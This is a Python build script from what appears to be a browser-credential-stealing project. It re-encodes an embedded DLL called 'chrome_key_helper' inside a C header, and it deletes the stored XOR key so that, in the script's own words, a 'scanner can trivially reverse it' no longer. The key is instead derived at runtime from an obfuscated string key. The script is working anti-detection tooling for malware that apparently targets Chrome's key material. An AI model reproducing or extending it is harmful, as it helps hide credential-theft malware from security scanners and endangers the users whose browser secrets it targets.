#!/usr/bin/env python3
"""
Re-encode chrome_key_helper_blob.h:
  - Remove the explicit xor_key array (scanner can trivially reverse it)
  - Re-apply XOR using a 16-byte key derived from EVS_KEY (never stored)

Run after bin2h.py generates the blob:
  python tools/encrypt_blob.py
Called automatically by: make chrome-helper (after bin2h step)
"""
import os
import re
import sys


def _expand_key(k: int) -> list[int]:
    """Mirror of browser.c _ckh_key(): LCG expansion from EVS_KEY byte."""
    out = [k]
    for _ in range(15):
        out.append((out[-1] * 0x6B + 0x41) & 0xFF)
    return out


def main() -> None:
    root       = os.path.normpath(os.path.join(os.path.dirname(__file__), ".."))
    blob_h     = os.path.join(root, "include", "chrome_key_helper_blob.h")
    evs_h      = os.path.join(root, "include", "evs_strings.h")
    state_file = os.path.join(root, "include", ".evs_blob_key")  # not compiled in

    # ── Read current EVS_KEY ──────────────────────────────────────────────────
    with open(evs_h) as f:
        evs_src = f.read()
    m = re.search(r"EVS_KEY\s+0x([0-9a-fA-F]+)u", evs_src)
    if not m:
        print("[err] EVS_KEY not found in", evs_h); sys.exit(1)
    evs_key = int(m.group(1), 16)
    new_key = _expand_key(evs_key)

    # ── Read blob header ──────────────────────────────────────────────────────
    with open(blob_h) as f:
        text = f.read()

    # Determine how the blob is currently encoded
    if "xor_key" in text:
        # First run: original nibble-split + explicit 4-byte XOR key from bin2h
        m_k = re.search(r"xor_key\[\]\s*=\s*\{([^}]+)\}", text)
        if not m_k:
            print("[err] xor_key array not found"); sys.exit(1)
        old_key_bytes = [int(x.strip(), 16) for x in m_k.group(1).split(",") if x.strip()]
        old_key_len   = len(old_key_bytes)
        decode_nibble = lambda i, hi, lo: ((hi << 4) | lo) ^ old_key_bytes[i % old_key_len]
    else:
        # Subsequent run: nibble-split + EVS_KEY-derived key (from state file)
        if not os.path.exists(state_file):
            print("[err] no .evs_blob_key state — regenerate blob with: make chrome-helper")
            sys.exit(1)
        with open(state_file) as f:
            prev_evs = int(f.read().strip(), 16)
        if prev_evs == evs_key:
            print(f"[skip] blob already encoded with current EVS_KEY=0x{evs_key:02x}")
            sys.exit(0)
        prev_key = _expand_key(prev_evs)
        decode_nibble = lambda i, hi, lo: ((hi << 4) | lo) ^ prev_key[i & 15]
        old_key_bytes = None  # unused in this branch

    # Extract nibble array
    m_arr = re.search(
        r"chrome_key_helper_dll\[\]\s*=\s*\{([\s\S]+?)\};",
        text,
    )
    if not m_arr:
        print("[err] blob array not found"); sys.exit(1)
    tokens = re.findall(r"0x[0-9a-fA-F]+", m_arr.group(1))
    nibbles = [int(t, 16) for t in tokens]

    # Extract dll_len
    m_len = re.search(r"chrome_key_helper_dll_len\s*=\s*(\d+)", text)
    if not m_len:
        print("[err] dll_len not found"); sys.exit(1)
    dll_len = int(m_len.group(1))

    if len(nibbles) != dll_len * 2:
        print(f"[err] nibble count {len(nibbles)} != dll_len*2 {dll_len*2}"); sys.exit(1)

    # ── Decode original PE bytes ──────────────────────────────────────────────
    original: list[int] = []
    for i in range(dll_len):
        hi = nibbles[i * 2]
        lo = nibbles[i * 2 + 1]
        original.append(decode_nibble(i, hi, lo))

    # ── Re-encode with EVS_KEY-derived 16-byte key ────────────────────────────
    new_nibbles: list[int] = []
    for i, b in enumerate(original):
        enc = b ^ new_key[i & 15]
        new_nibbles.append((enc >> 4) & 0xF)
        new_nibbles.append(enc & 0xF)

    # ── Write new header (no xor_key) ─────────────────────────────────────────
    cols = 16
    rows: list[str] = []
    for i in range(0, len(new_nibbles), cols):
        chunk = new_nibbles[i:i + cols]
        rows.append("  " + ", ".join(f"0x{v:02x}" for v in chunk))
    arr_body = ",\n".join(rows)

    new_text = (
        "/* auto-generated by bin2h.py + encrypt_blob.py — do not edit */\n"
        "static const unsigned char chrome_key_helper_dll[] = {\n"
        f"{arr_body}\n"
        "};\n"
        f"static const unsigned int chrome_key_helper_dll_len = {dll_len};\n"
    )

    with open(blob_h, "w") as f:
        f.write(new_text)

    # Save current EVS_KEY so next run can re-decode before re-encoding
    with open(state_file, "w") as f:
        f.write(f"0x{evs_key:02x}\n")

    print(f"[ok] re-encoded {blob_h}  (EVS_KEY=0x{evs_key:02x}, {dll_len} bytes)")
    print(f"     xor_key array removed — key now derived at runtime from EVS_KEY")


if __name__ == "__main__":
    main()
